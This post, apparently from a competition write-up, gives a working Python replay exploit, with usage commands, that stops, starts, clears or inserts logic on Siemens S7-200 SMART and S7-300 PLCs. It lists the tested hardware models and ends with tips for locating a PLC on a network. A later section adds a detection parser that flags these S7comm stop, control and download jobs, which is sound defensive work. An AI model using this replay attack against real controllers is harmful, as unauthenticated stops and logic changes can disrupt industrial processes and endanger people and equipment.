In a competition I ran into scripted control of an S7-200 SMART. Because the model is old, the traffic carries no authentication or encryption at all: capture a normal session with Wireshark and replay the packets as they are. Current functions:
- start
- stop
- clear logic
- insert logic
Tested successfully on the following models:
- s7-200 : 6ES7 288-1ST20-0AA0
- s7-300 : 6ES7 315-2EH14-0AB0
Usage:
```
➜ python exp.py 192.168.2.1 stop
➜ python exp.py 192.168.2.1 run
➜ python exp.py 192.168.2.1 clear
➜ python exp.py 192.168.2.1 insert
```
```python
import socket
import sys

# Frames captured from a legitimate session (TPKT + COTP + S7comm PDU) and
# replayed unchanged. Python 3: bytes.fromhex() replaces the old str.decode("hex").

# COTP connection request to the PLC's ISO-TSAP endpoint (TCP 102).
cotp = bytes.fromhex("0300001611e00000000100c1021000c2020300c0010a")
# S7 "setup communication" job (function 0xf0), negotiates the PDU size.
setcom = bytes.fromhex("0300001902f08032010000ccc100080000f0000001000103c0")
# PLC stop (function 0x29, PI service "P_PROGRAM").
stop = bytes.fromhex("0300002102f080320100000e000010000029000000000009505f50524f4752414d")
# PLC control / run (function 0x28, PI service "P_PROGRAM").
start = bytes.fromhex("0300002502f080320100000c000014000028000000000000fd000009505f50524f4752414d")
# PLC control with PI service "_INSE" on block "08000001P"; the two frames differ
# only in the PDU reference, one captured after each of the two download sequences.
clearob = bytes.fromhex("0300002b02f080320100000038001a000028000000000000fd000a01003038303030303150055f494e5345")
insertob = bytes.fromhex("0300002b02f0803201000000b2001a000028000000000000fd000a01003038303030303150055f494e5345")
# Three-frame download sequence captured while clearing the logic...
a = bytes.fromhex("0300003102f0803201000001ed00200000fa00010000000000095f30383030303031500d01303030313435303030303136")
b = bytes.fromhex("030000b802f0803201000001ef00120095fb00010000000000095f3038303030303150009100fb707000001308000100000091000000000033f66033360033f63133360000005d00000010fe9c014a8292aeedd60000e9cd0000e50600b1060000789c636760646086622e0106060626061060f175f4f4e31667800b00016bb05350bc0103038f084298d5d32f0424c6c009c48c40cc9fc8c600346c148c024cf06234618c029ce0e568ea180538c12b68ea000011ab07dd")
c = bytes.fromhex("0300002302f0803201000001f000120000fc00010000000000095f3038303030303150")
# ...and the corresponding sequence captured while inserting logic.
fa = bytes.fromhex("0300003102f0803201000000ae00200000fa00010000000000095f30383030303031500d01303030313439303030303230")
fb = bytes.fromhex("030000bc02f0803201000000b000120099fb00010000000000095f3038303030303150009500fb7070000013080001000000950000000000495ce13354003a5e9e33540000005d00000014fe9c014a82940711806340edd60000e9cd0000e50600b1060000789ce36660646086622e0106060626061060f175f4f4e31667800b00016bb05350bc0103038f084298d5d32f0424c6c009c48c40cc9fc8c600346c148c024cf06234618c029ce0e568ea180538c12b68ea00002c6f07e1")
fc = bytes.fromhex("0300002302f0803201000000b100120000fc00010000000000095f3038303030303150")

s = socket.socket()


def exchange(frame):
    """Send one captured frame and wait for the PLC's reply."""
    s.send(frame)
    return s.recv(1024)


def handshake():
    """COTP connect followed by S7 setup communication; required before any job."""
    exchange(cotp)
    exchange(setcom)


def s7200start():
    handshake()
    exchange(start)


def s7200stop():
    handshake()
    exchange(stop)


def s7200clearob():
    handshake()
    exchange(stop)
    for frame in (a, b, c, clearob):
        exchange(frame)
    exchange(start)


def s7200insertob():
    handshake()
    exchange(stop)
    for frame in (fa, fb, fc, insertob):
        exchange(frame)
    exchange(start)


if __name__ == "__main__":
    actions = {"run": s7200start, "stop": s7200stop,
               "clear": s7200clearob, "insert": s7200insertob}
    if len(sys.argv) != 3 or sys.argv[2] not in actions:
        sys.exit("usage: python exp.py <plc-ip> run|stop|clear|insert")
    s.connect((sys.argv[1], 102))
    actions[sys.argv[2]]()
```
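The replay works because nothing in the exchange is authenticated, and the flip side is that the same frames are easy to recognise on the wire. The following Python 3 snippet is an added example, not part of the original script: it parses the TPKT/COTP/S7comm headers of a TCP/102 payload, names the S7 function code (names follow the public Wireshark s7comm dissector) and raises an alert for PLC stop/control and download jobs as well as for any function code it does not know. The sample frames are the COTP, setup, stop, start and "_INSE" frames from the script above; the source address is constructed for the example.

```python
import struct

# S7comm function codes found in the first parameter byte of a Job PDU
# (names as used by the public Wireshark s7comm dissector).
S7_FUNCTIONS = {
    0x00: "CPU services",
    0x04: "Read variable",
    0x05: "Write variable",
    0x1a: "Request download",
    0x1b: "Download block",
    0x1c: "Download ended",
    0x1d: "Start upload",
    0x1e: "Upload",
    0x1f: "End upload",
    0x28: "PLC control",
    0x29: "PLC stop",
    0xf0: "Setup communication",
}
# Jobs that change the run state or the stored program. Anything not in
# S7_FUNCTIONS is alerted too: the PLC executes it without authentication
# all the same, and the S7-200 download frames above use such codes.
STATE_CHANGING = {0x05, 0x1a, 0x1b, 0x1c, 0x28, 0x29}

# Sample frames: the COTP, setup, stop, start and "_INSE" frames from the
# script on this page. The source address is constructed for the example.
FRAME_COTP_CR = bytes.fromhex("0300001611e00000000100c1021000c2020300c0010a")
FRAME_SETUP = bytes.fromhex("0300001902f08032010000ccc100080000f0000001000103c0")
FRAME_STOP = bytes.fromhex("0300002102f080320100000e000010000029000000000009505f50524f4752414d")
FRAME_START = bytes.fromhex("0300002502f080320100000c000014000028000000000000fd000009505f50524f4752414d")
FRAME_INSE = bytes.fromhex("0300002b02f080320100000038001a000028000000000000fd000a01003038303030303150055f494e5345")
SAMPLE_FRAMES = [
    ("192.0.2.10", FRAME_COTP_CR),
    ("192.0.2.10", FRAME_SETUP),
    ("192.0.2.10", FRAME_STOP),
    ("192.0.2.10", FRAME_START),
    ("192.0.2.10", FRAME_INSE),
]


def _pi_service(func, params):
    """Return the PI service name ("P_PROGRAM", "_INSE", ...) from the parameter
    block of a PLC control (0x28) or PLC stop (0x29) job, or "" if absent."""
    try:
        if func == 0x29:                        # 0x29, 5 unknown bytes, len, name
            n = params[6]
            return params[7:7 + n].decode("ascii", "replace")
        if func == 0x28:                        # 0x28, 7 unknown bytes, block len,
            blk = struct.unpack(">H", params[8:10])[0]   # block, len, name
            off = 10 + blk
            n = params[off]
            return params[off + 1:off + 1 + n].decode("ascii", "replace")
    except (IndexError, struct.error):
        pass
    return ""


def classify(pkt):
    """Parse one TCP/102 payload (TPKT + COTP [+ S7 PDU]).
    Returns a dict describing it, or None if it is not a well-formed TPKT frame."""
    if len(pkt) < 6 or pkt[0] != 0x03:
        return None
    if struct.unpack(">H", pkt[2:4])[0] != len(pkt):
        return None                             # truncated or lying length field
    cotp_len, cotp_type = pkt[4], pkt[5]
    s7 = pkt[5 + cotp_len:]                     # COTP body is cotp_len bytes long
    if cotp_type != 0xf0 or len(s7) < 10 or s7[0] != 0x32:
        # 0xe0 connect request / 0xd0 connect confirm, or no S7 PDU behind the COTP
        return {"layer": "cotp", "cotp_type": cotp_type, "alert": False}
    rosctr = s7[1]                              # 1 Job, 2 Ack, 3 Ack-Data, 7 Userdata
    param_len = struct.unpack(">H", s7[6:8])[0]
    hdr_len = 12 if rosctr == 0x03 else 10      # Ack-Data carries 2 extra error bytes
    params = s7[hdr_len:hdr_len + param_len]
    info = {"layer": "s7", "rosctr": rosctr, "function": None,
            "name": "", "pi_service": "", "alert": False}
    if rosctr != 0x01 or not params:
        return info                             # only Job PDUs carry commands
    func = params[0]
    info["function"] = func
    info["name"] = S7_FUNCTIONS.get(func, "unknown 0x%02x" % func)
    info["pi_service"] = _pi_service(func, params)
    info["alert"] = func in STATE_CHANGING or func not in S7_FUNCTIONS
    return info


def scan(frames):
    """Run classify() over (source, payload) pairs; return one line per alert."""
    alerts = []
    for src, pkt in frames:
        info = classify(pkt)
        if info and info["alert"]:
            alerts.append(f"{src}: {info['name']} {info['pi_service']}".rstrip())
    return alerts


if __name__ == "__main__":
    for line in scan(SAMPLE_FRAMES):
        print(line)
```

In practice the payloads come from a pcap or a span port (any packet library that hands you the TCP payload of port 102 will do); the useful signal is not the function code alone but a PLC control or download job arriving from any address other than the engineering workstation, which is exactly the replay scenario described above.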
Notes:
- If you have forgotten the PLC's exact IP within its /24 segment, connect the computer directly to the PLC with a network cable, set the NIC's IP address to any address in the target /24 segment, and then scan that segment.
- If you have forgotten even the /24 segment, the only option left is PLC discovery over layer-2 protocols.